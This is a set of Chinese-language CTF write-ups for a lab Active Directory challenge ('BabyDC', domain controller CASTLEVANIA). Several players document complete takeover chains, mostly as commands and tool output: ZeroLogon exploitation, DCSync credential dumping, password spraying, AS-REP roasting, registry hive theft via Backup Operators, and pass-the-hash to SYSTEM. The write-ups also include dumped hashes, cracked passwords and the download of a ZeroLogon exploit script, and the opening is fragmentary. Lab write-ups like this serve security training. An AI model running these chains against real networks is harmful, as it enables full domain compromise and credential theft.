XMCVE.local\p2zhh:1104:aad3b435b51404eeaad3b435b51404ee:bc2bf43119e258bcecf71d44abc29db7:::
XMCVE.local\mowen:1105:aad3b435b51404eeaad3b435b51404ee:efb5fa49a38497a71e144f690860688e:::

第三步：哈希传递- 获取管理员 Shell

XMCVE.local\sales:1106:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
XMCVE.local\support:1107:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe::
:
XMCVE.local\it:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
XMCVE.local\hr:1109:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
XMCVE.local\admin:1110:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
XMCVE.local\sqlsvc:1112:aad3b435b51404eeaad3b435b51404ee:d93ef04edb808c5bce3a5bd67b936ca9:::
CASTLEVANIA$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

$ impacket-psexec -hashes ':d94f9831271e229dbc6e712097b63168' \
   'XMCVE.local/Administrator@192.168.40.132' 'whoami'

nt authority\system

$ impacket-wmiexec -hashes ':d94f9831271e229dbc6e712097b63168' \
   'XMCVE.local/Administrator@192.168.40.132' 'whoami'

xmcve\administrator

$ impacket-wmiexec -hashes ':d94f9831271e229dbc6e712097b63168' \
   'XMCVE.local/Administrator@192.168.40.132' 'hostname'
   
CASTLEVANIA

$ impacket-wmiexec -hashes ':d94f9831271e229dbc6e712097b63168' \
   'XMCVE.local/Administrator@192.168.40.132' 'net user administrator'

User name                   Administrator
Account active              Yes
Local Group Memberships     *Administrators
Global Group memberships    *Domain Users         *Domain Admins

攻击路径总结

*Enterprise Admins    *Schema Admins
                 *Group Policy Creator

未经身份验证的攻击者
   │
   ▼
[1] ZeroLogon (CVE-2020-1472)
   │ 利用 Netlogon AES-CFB8 缺陷绕过身份验证
   │ 将 CASTLEVANIA$ 计算机账户密码置空
   ▼
[2] DCSync
   │ 使用空密码的计算机账户凭据，通过 DRSUAPI
   │ 协议复制所有域密码哈希
   ▼
[3] 哈希传递 (Pass-the-Hash)
   │ 使用 Administrator 的 NTLM 哈希
   │ (d94f9831271e229dbc6e712097b63168) 进行身份验证并执行命令
   ▼
[4] 获取 CASTLEVANIA (DC) 的 SYSTEM / Domain Admin Shell

Pr0x1ma（Zerologon）

配环境

找ip

找到 192.168.56.101 然后扫一下

nmap -sn 192.168.56.0/24

nmap

nmap -sV -sC -A -oN dc1_scan.txt 192.168.56.101

分析

主机信息
主机名：CASTLEVANIA
域名：XMCVE.local
端口与服务
7、80：IIS 10（Web 服务）
88：Kerberos（身份验证服务）
389 / 3268：LDAP / 全局编录（域目录服务）
445：SMB（文件共享服务）
1433：Microsoft SQL Server 2016 SP2

Web

但是没啥东西，在用dirsearch看看

curl -I 192.168.56.101

dirsearch

也没什么东西

Kerberos

不能进行AS-REP Roasting

MSSQL

没用，空密码登录也不行

DNS

啥也没有

ZeroLogon

检测

找了半天发现ZeroLogon是可行的

利用

找个能利用的脚本，清空密码

DCSync

DCSync拿Administrator的哈希

Getshell

哈希传递拿shell

lpppp（域用户-弱口令）

题目信息

题目名称：BabyDC

目标地址：192.168.56.155

本题没有提供最终 flag.txt，通关目标是获取最高权限。实际打通后，不仅拿到了目标主机的 NT AUTHORITY\SYSTEM，还进一步导出了整套域凭据，因此可以认为整台域控已经被完全接管。

整体判断

这题最关键的地方不在 Web 页面本身，而在于它是一台对外暴露了多种企业服务的域控。最开始做端口识别时，可以看到同时开放了 80、88、389、445、1433 等典型的 AD 与 MSSQL 服务端口。看到这种端口组合，应该立刻意识到这不是单纯的 Web 打点题，而是一个典型的“从弱口令或目录服务入手，逐步拿域内高权限”的内网题。

真正打通这题的主链如下：

先识别主机角色，确认这是一台域控。
用 Kerberos 与 SMB 做小规模弱口令喷洒，拿到首个低权域账户。
用这个低权账户查询 LDAP，找到开启“不需要 Kerberos 预认证”的用户。
对该用户做 AS-REP Roast，离线爆破得到更高价值账户口令。
利用该账户属于 Backup Operators 这一点，远程备份注册表 hive。
将 SAM、SYSTEM、SECURITY 拉回本地离线提取秘密，拿到本地 Administrator 哈希和服务账号口令。
使用 Administrator 的 NTLM 直接 Pass-the-Hash 到目标，获得 SYSTEM。
再用已经拿到的高权限继续导出整套域凭据，完成整题。

整个过程里，真正起决定作用的知识点只有三个：

域用户弱口令喷洒
AS-REP Roast
Backup Operators 结合 reg.py backup 远程导出 hive

其它分支虽然有探测，但并没有用于最终利用链，这里不写。

第一步：端口识别，确认目标是一台域控

先用 nmap 对目标做标准服务识别：

nmap -Pn -sC -sV -T4 192.168.56.155

这条命令的作用如下：

-Pn 表示不做主机发现，直接认为目标在线，避免 ICMP 被过滤导致误判。
-sC 调用常用 NSE 脚本，补充基础服务信息。
-sV 探测服务版本。
-T4 提高扫描速度。

关键结果如下：

53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2016 SP2

Domain: XMCVE.local
Host: CASTLEVANIA.XMCVE.local

看到这个结果时，基本可以直接下结论：

88、389、445 说明这是 AD 环境。
389 的返回里已经给出了域名 XMCVE.local。
主机名是 CASTLEVANIA.XMCVE.local。
1433 说明这台机子还跑了 SQL Server。

这一步非常重要，因为后面所有账号格式、认证方式、攻击顺序都要围绕“域控”来设计。也正因为它是域控，所以一旦打穿，收益会非常高。

第二步：小规模弱口令喷洒，拿到第一个可用域账户

既然这是域环境，直接盲扫 Web 没有明显入口时，最自然的思路就是先找一个最低成本的可用身份。这里没有上大字典，而是只做了小规模、高命中率的喷洒，避免无意义浪费时间。

先用 GetNPUsers.py 对一小批可能存在的用户做探测：

GetNPUsers.py XMCVE.local/ -dc-ip 192.168.56.155 -no-pass -usersfile /tmp/babydc_users.txt

这条命令的作用不是爆密码，而是利用 Kerberos 的错误回显区分“用户存在”和“用户不存在”。

从结果里可以确认如下用户是存在的：

admin
support
sqlsvc
castlevania
alucard

有了有效用户名后，再用 netexec 对 SMB 做一个非常小的弱口令喷洒：

netexec smb 192.168.56.155 \
  -u /tmp/babydc_valid_users.txt \
  -p /tmp/babydc_passwords.txt \
  --continue-on-success

这里的思路很明确：

只打一小批最常见口令，如 Password123!、P@ssw0rd! 以及用户名同密码变体。
用 --continue-on-success 保证一个账户命中后继续跑完，看看是否存在统一弱口令。

关键命中结果如下：

[+] XMCVE.local\admin:Password123!
[+] XMCVE.local\support:Password123!

这一步说明题目确实存在统一弱口令设计，而且此时已经拥有了两个可用域用户。虽然它们还不是高权限，但已经足够进入 LDAP 查询阶段。

第三步：查询 LDAP，锁定真正有利用价值的用户

有了 admin:Password123! 之后，下一件事不是继续无脑喷更多口令，而是立刻转向 LDAP 收集高价值用户属性。

这里使用：

netexec ldap 192.168.56.155 -u admin -p 'Password123!' --users

这个命令会把域中的用户枚举出来，并附带一些基础属性，比如最近修改密码时间、描述等。关键输出如下：

Administrator
Alucard
p2zhh
mowen
sales
support
it
hr
admin
sqlsvc    SQL Server Service Account

接着进一步查询 mowen 的属性：

ldapsearch -x -H ldap://192.168.56.155 \
  -D 'XMCVE\admin' -w 'Password123!' \
  -b 'DC=XMCVE,DC=local' \
  '(sAMAccountName=mowen)' \
  pwdLastSet description memberOf userAccountControl

关键结果是：

memberOf: CN=Backup Operators,CN=Builtin,DC=XMCVE,DC=local
userAccountControl: 4260352

这里的 4260352 非常关键。把它转成十六进制是：

0x410200

它包含了以下位：

NORMAL_ACCOUNT
DONT_EXPIRE_PASSWORD
DONT_REQ_PREAUTH

其中真正决定利用方向的是 DONT_REQ_PREAUTH。这意味着 mowen 不需要 Kerberos 预认证，可以直接做 AS-REP Roast。与此同时，它还属于 Backup Operators，说明即使这个账户不是管理员，也非常可能具备系统级备份相关能力。这两个条件叠加，使得 mowen 立刻成为整题最关键的突破口。

第四步：对 mowen 做 AS-REP Roast，离线爆出真实口令

确定 mowen 开启了 DONT_REQ_PREAUTH 后，下一步就是直接请求它的 AS-REP 响应并离线爆破。

先生成哈希：

echo mowen >/tmp/mowen_only.txt
GetNPUsers.py XMCVE.local/ \
  -dc-ip 192.168.56.155 \
  -no-pass \
  -request \
  -format hashcat \
  -outputfile /tmp/mowen_asrep.hash \
  -usersfile /tmp/mowen_only.txt

生成出的哈希大致如下：

$krb5asrep$23$mowen@XMCVE.LOCAL:2ebf4c95b4b4915427a335c63359292f$...

然后使用 hashcat 离线爆破：

hashcat -m 18200 /tmp/mowen_asrep.hash /usr/share/wordlists/rockyou.txt --force
hashcat -m 18200 /tmp/mowen_asrep.hash --show --force

这里 -m 18200 对应的就是 Kerberos 5 AS-REP 哈希模式。

最终爆破结果：

mowen:1maxwell

也就是说，我们拿到了第二个更高价值的域用户：

XMCVE\mowen : 1maxwell

这一跳是整道题最核心的转折点。前面的 admin/support 只是拿来查询 LDAP 的低权账号，真正能把题做通的是 mowen。

第五步：验证 mowen 的权限，确认 Backup Operators 利用可行

拿到 mowen:1maxwell 后，第一件事就是判断它到底有多大权限。这里使用：

netexec smb 192.168.56.155 -u mowen -p '1maxwell' --shares

返回结果如下：

ADMIN$          READ
C$              READ,WRITE
IPC$            READ
NETLOGON        READ
SYSVOL          READ

这个结果说明两件事：

mowen 确实拥有非常强的文件级能力。
它对 C$ 具备读写权限，这和 Backup Operators 的身份完全吻合。

但此时还不能直接等价于“远程命令执行”。随后测试了 wmiexec.py、atexec.py 等方式，结果都返回 rpc_s_access_denied，说明它并不具备完整的远程执行 ACL。因此正确的思路不是强行打 WMI/计划任务，而是回到 Backup Operators 的本质能力：远程备份系统数据。

第六步：利用 Backup Operators 远程备份注册表 hive

既然 mowen 属于 Backup Operators，最稳的利用方式就是使用 reg.py 远程备份系统注册表 hive。前面先确认一下远程注册表能否访问：

reg.py XMCVE.local/mowen:'1maxwell'@192.168.56.155 query -keyName 'HKLM\SAM'

HKLM\SAM
HKLM\SAM\SAM

这说明远程注册表访问是通的，后续可以尝试保存。

接下来直接使用 backup 动作一次性保存三份关键 hive：

reg.py XMCVE.local/mowen:'1maxwell'@192.168.56.155 backup -o 'C:\Windows\Temp'

关键结果如下：

[*] Saved HKLM\SAM to C:\Windows\Temp\SAM.save
[*] Saved HKLM\SYSTEM to C:\Windows\Temp\SYSTEM.save
[*] Saved HKLM\SECURITY to C:\Windows\Temp\SECURITY.save

这一步的本质是：

SAM 保存本地账号哈希
SYSTEM 里有 bootKey，用于解密 SAM/SECURITY
SECURITY 里有 LSA Secrets、服务密码、缓存凭据等高价值秘密

很多人做到这里会卡住，因为他们试图直接走远程执行。但本题真正的提权关键不是远程执行，而是“先把秘密导出来，再离线提取”。

第七步：拉回本地并离线提取秘密

先把远程保存好的三个文件拉回本地：

netexec smb 192.168.56.155 -u mowen -p '1maxwell' --get-file 'Windows\Temp\SAM.save' /tmp/SAM.save
netexec smb 192.168.56.155 -u mowen -p '1maxwell' --get-file 'Windows\Temp\SYSTEM.save' /tmp/SYSTEM.save
netexec smb 192.168.56.155 -u mowen -p '1maxwell' --get-file 'Windows\Temp\SECURITY.save' /tmp/SECURITY.save

然后使用 secretsdump.py 进行本地离线提取：

secretsdump.py -sam /tmp/SAM.save -system /tmp/SYSTEM.save -security /tmp/SECURITY.save LOCAL

这里的关键输出非常重要：

Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::

[*] _SC_MSSQLSERVER
(Unknown User):Sql!2026

这个结果意味着我们一次性拿到了两个关键资产：

Administrator 的 NTLM 哈希d94f9831271e229dbc6e712097b63168
SQL Server 服务密码_SC_MSSQLSERVER = Sql!2026

先说第二个。服务密码后来验证对应的是域用户 sqlsvc，说明 SECURITY hive 里确实成功导出了服务机密：

XMCVE\sqlsvc : Sql!2026

但这条线虽然能登录 SMB，却没有直接带来远程执行，所以真正决定通关的仍然是第一个东西，也就是 Administrator 的 NTLM 哈希。

第八步：使用 Administrator 哈希直接 Pass-the-Hash，拿到 SYSTEM

拿到 Administrator 的 NTLM 哈希后，最直接的做法就是 PTH。这里使用 psexec.py：

psexec.py \
  -hashes aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168 \
  ./Administrator@192.168.56.155 \
  'whoami'

这条命令里有几个点需要说明：

LM hash 这里用的是空 LM 的固定占位值 aad3b435b51404eeaad3b435b51404ee
NT hash 就是刚刚从 SAM 中提取出来的管理员哈希
./Administrator@192.168.56.155 表示使用本地上下文账号发起认证

关键返回如下：

[*] Found writable share ADMIN$
[*] Uploading file EXviAwVA.exe
[*] Creating service Uchr on 192.168.56.155.....
[*] Starting service Uchr.....
nt authority\system

为什么这说明已经拿下最高权限？

因为 psexec.py 的原理是：

先通过 SMB 把一个服务可执行文件上传到目标机
再通过服务控制管理器创建并启动临时服务
服务默认以 LocalSystem 运行

也就是说，只要这一套链条完整走通，并且最后执行结果回显 nt authority\system，就已经不是普通管理员权限，而是标准的 Windows 最高本地权限。

为了把证据补完整，还进一步执行了：

psexec.py \
  -hashes aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168 \
  ./Administrator@192.168.56.155 \
  'whoami /all'

返回结果里明确出现：

User Name
nt authority\system

SeDebugPrivilege                 Enabled
SeImpersonatePrivilege           Enabled
SeTcbPrivilege                   Enabled

到这里就可以非常明确地确认，本题的最高权限已经拿到。

第九步：在已拿到高权限后继续导出整套域凭据

虽然题目到拿下 SYSTEM 就已经结束了，但因为目标本身是一台 DC，所以在已有管理员哈希的情况下，还可以顺手把整套域凭据导出来，进一步证明整台域控已经完全接管。

这里直接使用：

secretsdump.py \
  -hashes aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168 \
  ./Administrator@192.168.56.155

关键输出如下：

krbtgt:502:...:1e3c4fe72e1383c576b4b3aeef4730a8:::
Alucard:1000:...:d94f9831271e229dbc6e712097b63168:::
XMCVE.local\mowen:1105:...:efb5fa49a38497a71e144f690860688e:::
XMCVE.local\admin:1110:...:2b576acbe6bcfda7294d6bd18041b8fe:::
XMCVE.local\sqlsvc:1112:...:d93ef04edb808c5bce3a5bd67b936ca9:::

这里最重要的意义在于：

krbtgt 哈希已经被导出，说明整个域的核心机密已经暴露。
题目里的所有域用户哈希也全部拿到了。
从“拿到一台主机的 SYSTEM”进一步升级成了“完全接管整套域”。

因此本题最终的通关状态，不只是单机 SYSTEM，而是完整的域控接管。

关键命令汇总

端口识别：

nmap -Pn -sC -sV -T4 192.168.56.155

弱口令喷洒：

netexec smb 192.168.56.155 -u /tmp/babydc_valid_users.txt -p /tmp/babydc_passwords.txt --continue-on-success

LDAP 查询 mowen：

ldapsearch -x -H ldap://192.168.56.155 \
  -D 'XMCVE\admin' -w 'Password123!' \
  -b 'DC=XMCVE,DC=local' \
  '(sAMAccountName=mowen)' \
  pwdLastSet description memberOf userAccountControl

AS-REP Roast：

GetNPUsers.py XMCVE.local/ \
  -dc-ip 192.168.56.155 \
  -no-pass \
  -request \
  -format hashcat \
  -outputfile /tmp/mowen_asrep.hash \
  -usersfile /tmp/mowen_only.txt

离线爆破：

hashcat -m 18200 /tmp/mowen_asrep.hash /usr/share/wordlists/rockyou.txt --force

远程备份注册表：

reg.py XMCVE.local/mowen:'1maxwell'@192.168.56.155 backup -o 'C:\Windows\Temp'

拉取 hive：

netexec smb 192.168.56.155 -u mowen -p '1maxwell' --get-file 'Windows\Temp\SAM.save' /tmp/SAM.save
netexec smb 192.168.56.155 -u mowen -p '1maxwell' --get-file 'Windows\Temp\SYSTEM.save' /tmp/SYSTEM.save
netexec smb 192.168.56.155 -u mowen -p '1maxwell' --get-file 'Windows\Temp\SECURITY.save' /tmp/SECURITY.save

离线提取秘密：

secretsdump.py -sam /tmp/SAM.save -system /tmp/SYSTEM.save -security /tmp/SECURITY.save LOCAL

PTH 拿 SYSTEM：

psexec.py \
  -hashes aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168 \
  ./Administrator@192.168.56.155 \
  'whoami /all'

导出整域凭据：

secretsdump.py \
  -hashes aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168 \
  ./Administrator@192.168.56.155

最终拿到的关键凭据

XMCVE\admin : Password123!
XMCVE\support : Password123!
XMCVE\mowen : 1maxwell
XMCVE\sqlsvc : Sql!2026
Administrator NTLM : d94f9831271e229dbc6e712097b63168
krbtgt NTLM : 1e3c4fe72e1383c576b4b3aeef4730a8

复盘

这题表面上看是一个带 IIS 和 MSSQL 的 Windows 主机，但真正的核心突破点并不是 Web，也不是 SQL，而是域用户属性和组权限设计。前面的统一弱口令只负责帮我们拿到一个能查询 LDAP 的入口，真正打通题目的关键是：

先通过 LDAP 找到 mowen
再利用它的 DONT_REQ_PREAUTH
拿到 mowen 口令后再利用 Backup Operators
最终通过离线提取出来的管理员哈希完成 PTH

这条链路最大的优点是稳定，不依赖内存注入，不依赖复杂提权洞，也不依赖题目作者额外埋的 Web RCE。只要把账户属性和组权限利用对了，就能非常稳地一路走到 SYSTEM

Echoin（Zerologon）

配置好kali和vritualbox：

VirtualBox 靶机 → Host-Only（192.168.56.x）
VMware Kali → 也接到 VirtualBox Host-Only 这张网卡

在56网段找ip,匹配对应的MAC：08:00:27:f1:06:a7，就是这个靶机的IP

ip：192.168.56.101

nmap

┌──(echoin㉿kali)-[~]
└─$ nmap -sV 192.168.56.101 -A
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-29 15:30 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.0014s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: CASTLEVANIA Portal
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-29 07:31:08Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: XMCVE.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2016 13.00.5026.00; SP2
| ms-sql-ntlm-info: 
|   192.168.56.101:1433: 
|     Target_Name: XMCVE
|     NetBIOS_Domain_Name: XMCVE
|     NetBIOS_Computer_Name: CASTLEVANIA
|     DNS_Domain_Name: XMCVE.local
|     DNS_Computer_Name: CASTLEVANIA.XMCVE.local
|     DNS_Tree_Name: XMCVE.local
|_    Product_Version: 10.0.17763
|_ssl-date: 2026-03-29T07:31:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-03-29T04:51:28
|_Not valid after:  2056-03-29T04:51:28
| ms-sql-info: 
|   192.168.56.101:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 SP2
|       number: 13.00.5026.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 1433
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: XMCVE.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
MAC Address: 08:00:27:F1:06:A7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1803 (91%), Microsoft Windows 10 1903 - 21H1 (91%), Microsoft Windows Server 2019 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: CASTLEVANIA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_nbstat: NetBIOS name: CASTLEVANIA, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:f1:06:a7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| smb2-time: 
|   date: 2026-03-29T07:31:13
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   1.37 ms 192.168.56.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.62 seconds

关键端口：

53 DNS
80 http
88 Kerberos
389/636/3268/3269 LDAP/GC
139/445 SMB
1433 MSSQL

关键信息：

NetBIOS 域名：XMCVE
主机名：CASTLEVANIA
完整域名：CASTLEVANIA.XMCVE.local

80端口：访问IP

扫目录

feroxbuster -u http://192.168.56.101 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x aspx,asp,txt,config,zip,bak -k

没扫到

1433端口开着，扫一下mssql相关信息：

nmap -Pn -p1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-config,ms-sql-ntlm-info 192.168.56.101

得到的信息：

1433 ：对应服务是 Microsoft SQL Server 2016 SP2
主机：CASTLEVANIA
用户：XMCVE
域：XMCVE.local

但现在还不能直接从 SQL 打进去：ms-sql-config 报的是：No login credentials

139/445 SMB:共享信息

smbclient -L //192.168.56.101 -N

列出共享名
看到部分共享目录
枚举域信息
枚举用户/组
拿到主机角色信息

但是没有

389/636/3268/3269 :LDAP/GC匿名查询

域名
OU
用户
组
计算机对象
邮箱
描述字段
SPN
域策略线索

ldapsearch -x -H ldap://192.168.56.101 -s base namingcontexts
ldapsearch -x -H ldap://192.168.56.101 -b "DC=XMCVE,DC=local"

得到信息：

DC=XMCVE,DC=local
CN=Configuration,DC=XMCVE,DC=local
CN=Schema,CN=Configuration,DC=XMCVE,DC=local
DC=DomainDnsZones,DC=XMCVE,DC=local
DC=ForestDnsZones,DC=XMCVE,DC=local

分析：

确认这是 AD 域，但后续想拿用户，得先找到凭据

Kerberos

因为靶机打开页面是有一个用户名Alucard，所以枚举一下

Alucard@XMCVE.local

administrator@XMCVE.local
Alucard@XMCVE.local
sqlsvc@XMCVE.local

再把这 3 个用户一起测一遍 AS-REP Roast

cat > valid_users.txt << 'EOF'
administrator
Alucard
sqlsvc
EOF

impacket-GetNPUsers XMCVE.local/ -dc-ip 192.168.56.101 -usersfile valid_users.txt -no-pass -request -format hashcat -outputfile asrep.txt

都没有UF_DONT_REQUIRE_PREAUTH，所以不行

试试cve

CVE-2020-1472（Zerologon）
CVE-2021-34527（PrintNightmare）

先试一下：CVE-2020-1472（Zerologon）

用 Zerologon 将机器账户密码清空，用 Zerologon 把域控机器账户密码清空之后，利用这个被控制的机器账户身份，通过 AD 复制接口，把域控里的 NTDS 凭据数据同步出来

impacket-secretsdump -just-dc -no-pass 'XMCVE.local/CASTLEVANIA$@192.168.56.101'

拿到凭据：

Administrator NTLM：d94f9831271e229dbc6e712097b63168
Alucard NTLM：d94f9831271e229dbc6e712097b63168
sqlsvc NTLM：d93ef04edb808c5bce3a5bd67b936ca9
CASTLEVANIA$ NTLM：31d6cfe0d16ae931b73c59d7e0c089c0

拿 Administrator 的 hash 直接登录

impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168 XMCVE.local/Administrator@192.168.56.101

k1ne(AI？)

很诡异的一篇wp，邮件中回复添加好友也是加的很迅速，询问wp中的问题时晾了我半个小时

四个问题的回复都是"ai打出来的，我啥也不知道"........真令我恼火

疑点有四，其一：wp一开始的dirsearch目录扫描就不可能扫到iis内置文本

该选手对此回复：“我kali里连不上那个靶机，ai扫出来的”

其二：flag是在哪个位置拿到的？可否截个图

该选手对此回复："镜像里指向的是C:\Users\Administrator\Desktop\flag.txt"

但是flag我在上架环境前便删得一干二净且让他给我截图时选手对此保持沉默无视

其三：wp里也没有记录p2zhh，mowen的密码获取方式

该选手对此回复："sql查出来的，镜像里都有，ai都能识别得到"

？？？.....这句话一出我对这道题瞬间变得如此陌生

其四：secretsdump出来的hash是如何转出明文的？

该选手对此回复："明文是我先拿到哈希，然后镜像有一段明文，然后对比，哈希值一模一"

后续：该选手因别的题导致出现在封神台中

镜像导入

下载好镜像导⼊

信息收集

打开发现⽤户需要密码，猜测靶机启动了web服务尝试访问主机的⽹络信息，

扫描端口

拿到关键信息

靶机ip是10.78.22.137，扫⼀下常⻅的端⼝

发现存在⼀些服务，我在 Kali 中使⽤ nmap 扫描⽬标时，返回结果显示相关端⼝均为 filtered，可能是因为我kali在vm另⼀套⽹络⾥，可能有隔离。猜测开放了 Web 与 MSSQL 等服务。

目录扫描

访问⼀下

然后⽬录扫描⼀下有没有备份⽂件之类的

dirsearch -u http://10.78.22.137/ -e txt,config,bak,old,zip

发现泄露了⽂件

http://10.78.22.137/poo_connection.txt

Mssql登录&&嵌套执行

给出了mssql登录凭据尝试登录执⾏sql

查看端口&&枚举用户

验证权限

验证mowen身份权限

远程连接(失败)

获取hash

写脚本进⾏远程拿⽂件在⼀个终端开启

开另⼀个终端

离线提取Administrator哈希

Yarn（Zerologon）

前置准备

先定义变量：

$vm = 'f5429e33-3d2c-44cd-8f77-3db2ea0c74ba' $vbox = 'C:\Program Files\Oracle\VirtualBox\VBoxManage.exe' $plink = 'C:\Program Files\PuTTY\plink.exe'

确认虚拟机在运行：

& $vbox list runningvms

看网卡模式和现有转发：

& $vbox showvminfo $vm --machinereadable | Select-String 'nic|Forwarding'

看来宾 IP：

& $vbox guestproperty enumerate $vm | Select-String 'V4/IP'

服务器转发

接下来做服务器转发本来想用kali 发现两个c段不同不好通信

被迫选择服务器中转

$vm = 'f5429e33-3d2c-44cd-8f77-3db2ea0c74ba'
$vbox = 'C:\Program Files\Oracle\VirtualBox\VBoxManage.exe'
& $vbox guestproperty enumerate $vm | Select-String 'V4/IP'

做中转

安装环境并连接本机

安装环境并连接本机:

python3 -m venv ~/babydc-venv
. ~/babydc-venv/bin/activate
pip install impacket ldap3 pyfiglet termcolor
sudo apt update
sudo apt install -y ldap-utils socat curl
curl -L -o ~/zerologon.py https://raw.githubusercontent.com/VoidSec/CVE-2020-1472/master/cve-2020-1472-exploit.py

检查确认

检查：

nc -vz 127.0.0.1 21389
nc -vz 127.0.0.1 21445
nc -vz 127.0.0.1 20135

确认 LDAP：

本地代理

. Ubuntu 启动本地代理

sudo pkill -f "socat TCP-LISTEN:135" || true
sudo pkill -f "socat TCP-LISTEN:445" || true
sudo pkill -f "socat TCP-LISTEN:49674" || true
sudo pkill -f "socat TCP-LISTEN:49667" || true
sudo nohup socat TCP-LISTEN:135,reuseaddr,fork TCP:127.0.0.1:20135 >/tmp/socat135.log 2>&1 &
sudo nohup socat TCP-LISTEN:445,reuseaddr,fork TCP:127.0.0.1:21445 >/tmp/socat445.log 2>&1 &
sudo nohup socat TCP-LISTEN:49674,reuseaddr,fork TCP:127.0.0.1:34974 >/tmp/socat49674.log 2>&1 &
sudo nohup socat TCP-LISTEN:49667,reuseaddr,fork TCP:127.0.0.1:34967 >/tmp/socat49667.log 2>&1 &

监听

开启监听：

测 SMB

python3 - <<'PY'
from impacket.smbconnection import SMBConnection
c = SMBConnection('CASTLEVANIA', '127.0.0.1', sess_port=445, timeout=10)
print('dialect', hex(c.getDialect()))
print('server', c.getServerName())
print('domain', c.getServerDomain())
print('os', c.getServerOS())
PY

Zerologon

打 Zerologon

printf 'y\n' | python3 ~/zerologon.py -t 127.0.0.1 -n CASTLEVANIA

导出管理员哈希

导出管理员哈希：

secretsdump.py -just-dc-user Administrator -no-pass 'XMCVE.local/CASTLEVANIA$@127.0.0.1' -dc-ip 127.0.0.1 -target-ip 127.0.0.1

babydc-venv) ubuntu@VM-16-10-ubuntu:~$ secretsdump.py -just-dc-user Administrator -no-pass 'XMCVE.local/CASTLEVANIA$@127.0.0.1' -dc-ip 127.0.0.1 -target-ip 127.0.0.1
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:13e54f64708d675c0a54eb4b40e2ca21b2fcb3e6298969d741fc6e70a9367786
Administrator:aes128-cts-hmac-sha1-96:aafdd9e5c02b41dece2a83b2d9b4439c
Administrator:des-cbc-md5:80584683e63d5845
[*] Cleaning up...
(babydc-venv) ubuntu@VM-16-10-ubuntu:~$

验证高权限命令执行

psexec.py -hashes :d94f9831271e229dbc6e712097b63168 'XMCVE.local/Administrator@127.0.0.1' "cmd.exe /c whoami & hostname"

(babydc-venv) ubuntu@VM-16-10-ubuntu:~$ psexec.py -hashes :d94f9831271e229dbc6e712097b63168 'XMCVE.local/Administrator@127.0.0.1' "cmd.exe /c whoami & hostname"
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 127.0.0.1.....
[*] Found writable share ADMIN$
[*] Uploading file XWajdGZq.exe
[*] Opening SVCManager on 127.0.0.1.....
[*] Creating service kiue on 127.0.0.1.....
